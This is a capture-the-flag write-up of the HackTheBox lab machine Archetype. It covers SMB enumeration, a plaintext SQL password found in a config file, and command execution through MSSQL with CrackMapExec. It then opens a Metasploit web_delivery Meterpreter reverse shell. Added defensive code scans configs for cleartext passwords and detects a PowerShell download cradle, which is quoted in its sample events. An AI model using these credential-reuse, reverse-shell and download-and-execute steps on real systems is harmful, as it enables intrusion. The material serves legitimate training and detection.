Archetype on HackTheBox

Archetype is a box on HackTheBox that is classified as “very easy.” It’s in the Starting Point track, so it’s meant to give introductory lessons in using SMB, MSSQL, and discovering plaintext passwords. After completing the CPTS path, I decided to go back and revisit the Starting Point machines to see where I could try different techniques and tools, expand my knowledge of them, and practice.
We start with an Nmap Scan:
$ nmap -sC -sV 10.129.53.34
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-21 13:21 BST
Nmap scan report for 10.129.53.34
Host is up (0.070s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-06-21T11:30:35
|_Not valid after: 2053-06-21T11:30:35
|_ssl-date: 2023-06-21T12:22:00+00:00; 0s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h45m01s, deviation: 3h30m02s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-06-21T12:21:55
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-06-21T05:21:56-07:00
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.64 seconds
There are lots of places to start here, but if there’s an SMB port open and no web port, as here, I’ll usually start by looking at what’s in the shares. There are a number of ways to do that.
SMB Enumeration and File Download
We can start with smbclient:
$ smbclient -L //10.129.53.34
Password for [WORKGROUP\htb-user]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
We see there is a share called “backups” that we might be interested in. We can log in with smbclient and see what’s in there.
$ smbclient '\\10.129.53.34\backups'
Password for [WORKGROUP\htb-user]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jan 20 12:20:57 2020
.. D 0 Mon Jan 20 12:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 12:23:02 2020
5056511 blocks of size 4096. 2615956 blocks available
smb: \>
We can then download the file from the smb: \> prompt with get prod.dtsConfig.
We can do the same thing with SMBMap.
$ smbmap -H 10.129.53.34 -u guest
[+] IP: 10.129.53.34:445 Name: 10.129.53.34
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backups READ ONLY
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
$ smbmap -H 10.129.53.34 -u guest -r backups
[+] IP: 10.129.53.34:445 Name: 10.129.53.34
Disk Permissions Comment
---- ----------- -------
backups READ ONLY
.\backups\*
dr--r--r-- 0 Mon Jan 20 12:20:57 2020 .
dr--r--r-- 0 Mon Jan 20 12:20:57 2020 ..
fw--w--w-- 609 Mon Jan 20 12:23:18 2020 prod.dtsConfig
Mount the \backups share
If we install cifs-utils with sudo apt install cifs-utils, we can mount the share and use it like a local directory.
$ sudo mount -t cifs '\\10.129.53.34\backups' /mnt/remote
Password for root@\\10.129.53.34\backups:
$ cd /mnt/remote
$ ls -la
total 8
drwxr-xr-x 2 root root 0 Jan 20 2020 .
drwxr-xr-x 3 root root 4096 Jun 21 10:58 ..
-r-xr-xr-x 1 root root 609 Jan 20 2020 prod.dtsConfig
Exposed Credentials
However we choose to get the file, we find a set of creds in it when we examine it. Incidentally, this is one of the big lessons of the Starting Point track: credentials are everywhere. They’re in users’ notes, they’re in config files, they’re hardcoded into binaries.
$ cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
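As an added example (my own code, not from the write-up, HackTheBox or Microsoft), here is a small scanner that walks a .dtsConfig file and reports every connection string carrying a plaintext Password= or Pwd= key, masking the secret so the report itself does not leak it. The embedded sample is constructed from the prod.dtsConfig above plus a second, integrated-auth connection that must not be flagged; the SECRET_KEYS tuple and the helper names are my own, while the element and attribute names are the ones SSIS actually writes.

```python
"""Report connection strings with cleartext passwords in SSIS .dtsConfig files."""
import sys
import xml.etree.ElementTree as ET

# Connection-string keys whose value is a secret stored in the clear (my own list).
SECRET_KEYS = ("password", "pwd")

# Constructed sample: the prod.dtsConfig from the share, plus a second connection
# that uses Windows integrated auth and therefore carries no password.
SAMPLE_DTSCONFIG = """<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Staging;Provider=SQLNCLI10.1;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""


def parse_connection_string(value):
    """Split 'Key=Value;Key=Value;' into a dict keyed by lower-cased key names."""
    parts = {}
    for item in value.split(";"):
        key, sep, val = item.partition("=")
        if sep:  # skip empty trailing segments and items without '='
            parts[key.strip().lower()] = val.strip()
    return parts


def mask(secret):
    """Keep the first two characters so a finding can be matched, hide the rest."""
    if len(secret) > 2:
        return secret[:2] + "*" * (len(secret) - 2)
    return "*" * len(secret)


def find_plaintext_credentials(xml_text):
    """Return (Path, user, masked password) for each ConfiguredValue holding a cleartext password."""
    root = ET.fromstring(xml_text)
    findings = []
    for conf in root.iter("Configuration"):
        value_el = conf.find("ConfiguredValue")
        if value_el is None or not value_el.text:
            continue
        parts = parse_connection_string(value_el.text)
        secret = next((parts[k] for k in SECRET_KEYS if k in parts), None)
        if secret is None:
            continue  # integrated auth or no password key: nothing exposed
        user = parts.get("user id", parts.get("uid", "<unknown>"))
        findings.append((conf.get("Path", ""), user, mask(secret)))
    return findings


if __name__ == "__main__":
    # Scan files named on the command line, or the embedded sample when none are given.
    sources = [(p, open(p, encoding="utf-8").read()) for p in sys.argv[1:]]
    sources = sources or [("<sample>", SAMPLE_DTSCONFIG)]
    for name, text in sources:
        for path, user, masked in find_plaintext_credentials(text):
            print(f"{name}: {path} -> user={user} password={masked}")
```

Run it against a mounted share (for example python3 scan_dtsconfig.py /mnt/remote/*.dtsConfig) and it prints one line per exposed credential. The same idea belongs in a pre-commit or CI check for any repository that holds SSIS packages: the fix is to move the password out of the file (SSIS package protection levels, integrated auth, or a secrets store), not just to restrict the share.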
Check Logins with CrackmapExec (CME)
The official walkthrough for the box expects you to log in and fiddle with the MSSQL service to create a reverse shell. That’s great info and useful, but I wanted to see what I could do with CrackMapExec and Metasploit, which manage the same thing with much less fiddling. First we check the credentials against the services we’d previously identified with our nmap scan: SMB, WinRM, and MSSQL.
$ cme smb 10.129.53.34 -u sql_svc -p 'M3g4c0rp123'
SMB 10.129.53.34 445 ARCHETYPE [*] Windows Server 2019 Standard 17763 x64 (name:ARCHETYPE) (domain:Archetype) (signing:False) (SMBv1:True)
SMB 10.129.53.34 445 ARCHETYPE [+] Archetype\sql_svc:M3g4c0rp123
$ cme winrm 10.129.53.34 -u sql_svc -p 'M3g4c0rp123'
SMB 10.129.53.34 5985 ARCHETYPE [*] Windows 10.0 Build 17763 (name:ARCHETYPE) (domain:Archetype)
HTTP 10.129.53.34 5985 ARCHETYPE [*] http://10.129.53.34:5985/wsman
WINRM 10.129.53.34 5985 ARCHETYPE [-] Archetype\sql_svc:M3g4c0rp123
$ cme mssql 10.129.53.34 -u sql_svc -p 'M3g4c0rp123'
MSSQL 10.129.53.34 1433 ARCHETYPE [*] Windows 10.0 Build 17763 (name:ARCHETYPE) (domain:Archetype)
MSSQL 10.129.53.34 1433 ARCHETYPE [+] Archetype\sql_svc:M3g4c0rp123 (Pwn3d!)
So we can see from this that we can log in over SMB, we can’t log in over WinRM, and the account has admin privileges over the MSSQL service (indicated by the Pwn3d! flag).
This means that we can execute commands and very easily get a Meterpreter shell going.
Meterpreter Shell Using CME and the Sql_Svc Account.
Since we’ve got admin rights over the MSSQL service, it’s very easy to execute commands and even get a reverse shell. We can get a Meterpreter shell without even uploading anything onto the target system.
We can execute commands using the -X switch. For example, we can get information about the target system by running systeminfo through it:
$ cme mssql 10.129.53.34 -u sql_svc -p 'M3g4c0rp123' -X systeminfo
MSSQL 10.129.53.34 1433 ARCHETYPE [*] Windows 10.0 Build 17763 (name:ARCHETYPE) (domain:Archetype)
MSSQL 10.129.53.34 1433 ARCHETYPE [+] Archetype\sql_svc:M3g4c0rp123 (Pwn3d!)
MSSQL 10.129.53.34 1433 ARCHETYPE [+] Executed command via mssqlexec
MSSQL 10.129.53.34 1433 ARCHETYPE --------------------------------------------------------------------------------
MSSQL 10.129.53.34 1433 ARCHETYPE Host Name: ARCHETYPE
MSSQL 10.129.53.34 1433 ARCHETYPE OS Name: Microsoft Windows Server 2019 Standard
MSSQL 10.129.53.34 1433 ARCHETYPE OS Version: 10.0.17763 N/A Build 17763
--- <SNIP> ---
MSSQL 10.129.53.34 1433 ARCHETYPE System Type: x64-based PC
We start up Metasploit, select the exploit/multi/script/web_delivery module, and set the following options:
set lhost <Attack IP>
set lport 4444
set payload windows/x64/meterpreter/reverse_tcp
set target 2
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) >> options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <ATTACK IP>      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   2   PSH
And run the job.
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) >> run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.15:4444
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >> [*] Using URL: http://10.10.14.15:8080/F7tGbZa9SUqbMJ
[*] Server started.
[*] Run the following command on the target machine:
<SNIP>
The job starts and goes to the background immediately. Basically, it’s waiting for a connection so it can serve up the payload. Now we run the web_delivery module in CrackMapExec and pass it the URL that Metasploit gave us.
$ cme mssql 10.129.53.34 -u sql_svc -p 'M3g4c0rp123' -M web_delivery -o URL=http://10.10.14.15:8080/F7tGbZa9SUqbMJ
MSSQL 10.129.53.34 1433 ARCHETYPE [*] Windows 10.0 Build 17763 (name:ARCHETYPE) (domain:Archetype)
MSSQL 10.129.53.34 1433 ARCHETYPE [+] Archetype\sql_svc:M3g4c0rp123 (Pwn3d!)
And we get a meterpreter shell!
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >> [*] 10.129.53.34 web_delivery - Delivering Payload (3738 bytes)
[*] Sending stage (200774 bytes) to 10.129.53.34
[*] Meterpreter session 1 opened (10.10.14.15:4444 -> 10.129.53.34:49677) at 2023-06-21 15:04:35 +0100
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >> sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(C:\Windows\system32) >
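From the defender’s side, everything CME just did shows up on the host as sqlservr.exe spawning cmd.exe (the xp_cmdshell path behind “Executed command via mssqlexec”) followed by a PowerShell one-liner fetching the stage from the web_delivery URL. As an added example (my own code, not from the write-up, CrackMapExec or Metasploit), here is detection logic that evaluates process-creation events for that pattern. The events are constructed to resemble Sysmon Event ID 1 / Windows 4688 fields; the field names, rule names and severities are my assumptions, and the cradle markers are the usual IEX / Net.WebClient / DownloadString strings rather than anything copied from the page’s <SNIP>.

```python
"""Flag process-creation events consistent with command execution through SQL Server."""
import ntpath
import re

SQL_SERVER = "sqlservr.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Substrings typical of an in-memory PowerShell download cradle (assumption, not from the page).
CRADLE_RE = re.compile(r"\biex\b|invoke-expression|downloadstring|net\.webclient|frombase64string")
# A hidden console window; weak on its own, useful in combination.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden")

# Constructed process-creation events shaped like Sysmon Event ID 1 / Windows 4688.
SAMPLE_EVENTS = [
    {"id": 1, "user": r"ARCHETYPE\sql_svc",
     "parent": r"C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c systeminfo"},
    {"id": 2, "user": r"ARCHETYPE\sql_svc",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://10.10.14.15:8080/F7tGbZa9SUqbMJ'))"},
    {"id": 3, "user": r"ARCHETYPE\Administrator",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe"},
    {"id": 4, "user": r"ARCHETYPE\Administrator",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Service"},
]


def basename(path):
    """Lower-cased file name of a Windows path (ntpath also works on Linux hosts)."""
    return ntpath.basename(path).lower()


def evaluate(event):
    """Return (rule, severity) hits for a single process-creation event."""
    hits = []
    parent, image = basename(event["parent"]), basename(event["image"])
    cmd = event.get("cmdline", "").lower()
    # Rule 1: the database engine itself launching a shell (xp_cmdshell / mssqlexec).
    if parent == SQL_SERVER and image in SHELLS:
        hits.append(("mssql_spawned_shell", "high"))
    # Rule 2: PowerShell pulling code over the network and executing it in memory.
    if image in POWERSHELL and CRADLE_RE.search(cmd):
        hits.append(("powershell_download_cradle", "high"))
    # Rule 3: hidden window, a supporting signal only.
    if image in POWERSHELL and HIDDEN_RE.search(cmd):
        hits.append(("powershell_hidden_window", "medium"))
    return hits


def scan(events):
    """Run every rule over every event; returns (event id, user, rule, severity) tuples."""
    return [(e["id"], e["user"], rule, sev) for e in events for rule, sev in evaluate(e)]


if __name__ == "__main__":
    for event_id, user, rule, severity in scan(SAMPLE_EVENTS):
        print(f"event {event_id} [{severity}] {rule} user={user}")
```

The first rule is the high-fidelity one: a SQL Server engine process has no routine reason to start cmd.exe, so a single hit under the SQL service account is worth an alert on its own. The second event in the sample would be missed by a parent-only rule because its parent is cmd.exe, which is why the cradle and hidden-window rules look at the command line instead. On the prevention side, the page’s Pwn3d! result is the thing to fix: a service account that is sysadmin on the instance with xp_cmdshell enabled turns any leaked connection string into host-level command execution.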
I’ll cover escalating using Rogue Potato in Part II.